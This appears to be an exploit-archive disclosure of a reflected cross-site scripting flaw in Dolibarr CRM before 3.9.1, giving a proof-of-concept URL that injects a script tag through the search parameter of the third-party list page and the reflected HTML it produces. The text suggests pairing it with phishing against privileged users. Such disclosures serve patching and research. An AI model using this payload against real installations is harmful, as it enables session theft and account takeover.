Home / os / winmobile

Dolibarr CRM Cross Site Scripting

Posted on 22 June 2016

# Exploit Title: Dolibarr CRM < 3.9.1 - Reflective XSS Vulnerability # Exploit Author: David Silveiro # Exploit Author Github: github.com/davidsilveiro # Exploit Author Twitter: twitter.com/david_silveiro # Vendor Homepage: https://www.dolibarr.org # Software Link: https://sourceforge.net/projects/dolibarr/files/ # Date: Zero Day Dolibarr ERP is a modern CRM to manage your company.It's opensource software, designed for small and medium companies, foundations and freelancers. The issue lyes with insufficient sanitization when a user makes use of the search function provided, and thus able to inject malicious JS to be used inhand with a phishing attack direct towards higher previliged user. POC: http://127.0.0.1/societe/list.php?sall=<script>alert()<%2Fscript> <form name="formfilter" action="/societe/list.php" method="post"> <input type="hidden" value="4a7a89e8a1f2f1fa55a6420ecb115954" name="token"></input> <input id="formfilteraction" type="hidden" value="list" name="formfilteraction"></input> <input type="hidden" value="s.nom" name="sortfield"></input> <input type="hidden" value="ASC" name="sortorder"></input> Search criteria ' <strong> <script> alert() <------- </script> </strong> ' into fields Third party name, Alias name, Custom… <table class="liste "></table> </form>

 

TOP